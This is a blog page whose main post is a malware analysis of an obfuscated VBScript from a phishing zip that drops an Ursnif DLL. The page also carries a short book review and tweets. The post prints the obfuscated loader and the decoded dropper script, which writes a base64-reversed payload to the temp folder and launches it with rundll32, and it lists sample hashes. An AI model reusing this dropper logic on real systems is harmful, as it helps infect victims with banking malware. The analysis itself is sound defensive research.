.Skip to main content
3 min read
Here is my first post of a short investigation into a malicious script that I came across.
The sample was posted to the URLhaus.abuse.ch list. This is probably part of a phising mail which directs you to download the zip file and open it.
When you do this, the VisualBasic script inside the zip archive will typically be launched and the encoded payload will be executed on the system.
After unzipping we can have a first look at the .vbs script
for tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN = lbound(wGPjfJzXJQxGLsJWnaUekdibWhoIi) to ubound(dVMYfYdJEGreGsr) : YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf = chr(sqr(wGPjfJzXJQxGLsJWnaUekdibWhoIi(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN)) - sqr(dVMYfYdJEGreGsr(tzZFStIadHqvhzdvlvlbpEXDSYhoiHcgeDgEKN))) : HoVEFmZZVAZqcifFckqTROBxVyUmGActyC = HoVEFmZZVAZqcifFckqTROBxVyUmGActyC & YVlUhhqxZMAvjAYHiFNxxrkWWvzkbiFf : next : execute(HoVEFmZZVAZqcifFckqTROBxVyUmGActyC)
A little rewriting and making it saver by echo the output instead of execute it, results in the following VBS code :
for Value = lbound(ArrayOne) to ubound(ArrayTwo) Result = chr(sqr(ArrayOne(Value)) - sqr(ArrayTwo(Value))) ConcatResult = ConcatResult & Result next WScript.Echo ConcatResult
Running this result in the following script.
on error resume next set WshShell = CreateObject("WScript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") Path = WshShell.ExpandEnvironmentStrings("%TEMP%") & "\Adobe.url" set oUrlLink = WshShell.CreateShortcut(Path) oUrlLink.TargetPath = "http://adobe.com" oUrlLink.Save(A) if (FSO.FileExists(Path)) Then WScript.Echo "Error!" else xml = "Msxml2.DOMDocument" ws = "WScript.Shell" bin = "bin.base64" sa = "shell.application" bs = "base64" db = "Adodb.Stream" Set wshs = createobject(ws) Set sh = createobject(sa) filepath = wshs.ExpandEnvironmentStrings("%TEMP%") & "\SHCSdw.dll" end if Set oXML = CreateObject(xml) Set oNode = oXML.CreateElement(bs) oNode.dataType = bin oNode.text = strreverse(code) Set BinaryStream = CreateObject(db) BinaryStream.Type = 1 BinaryStream.Open BinaryStream.Write oNode.nodeTypedValue BinaryStream.SaveToFile filepath sh.ShellExecute "cmd.exe", "/c everybody shit fuck & runDll32 "& filepath &",DllRegisterServer", "", "open", 0
The script places a Adobe.url in the temp folder pointing to http://
and it like I already suspected does a string reverse on the code variable - strreverse(code)
passing this via the base64 decoder resullts in a PE executable on the filesystem in your temp folder with the name SHCSdw.dll
The dropped file SHCSdw.dll is a Ursnif sample that was compiled at 2020-02-24 09:57:57, if you can believe this data. The sample is available in Virustotal.
|dokument9055.zip||Zip archive data||bde9ee61351d9c61ddf2e7fc382426a5301f1155e1197f2a3d47468db4486d9c|
|SHCSdw.dll||PE32 executable (DLL)||bc8da5ad4010226376c376b2d164cfa4e073a0f6ef7761e9f4864a46a8cb9b32|
Always funny to read a doctored DBG file location c:\big\fat\Usual\mind\Sight\did\said\Untilpiece.pdb from jhgsdiofiosdfisdhfiufsd.bin /cc @JAMESWT_MHT
Great thread and dig through by @fs0c131y: In to the creators of the app used to report results during the #IowaCaucuses - https://
1 min read
It came recommended in the Darknet Diaries Podcast ep 54: Notpetya by Jack Rhysider.
And as far as I'm concerned this is a must read for anyone working in Cybersecurity. It gives so much detail about the Russian government hacking techniques and motivations.
I already knew most of the separate attacks described in the book but getting the big picture how all these are related is an eye opener.
View all my reviews
@AlexKornitzer I'm not a coder by a long shot, but please let me know what you think of this scale I created https://
@James_inthe_box Nice find! The samples have been added to my Zoo. How do you create those histograms?
@Supernaut29A I'm working for an MSP, but reading his I think you need a different MSP. One nuance on the 'Minimum effort for maximum profit' statement. Often it is also what the customer gets what it pays for. If you take the cheapest MSP you probably will get the least service.
@cyb3rops I'm shamelessly going to steal both of them for my own future reference. I'm curious about the rest of the presentation.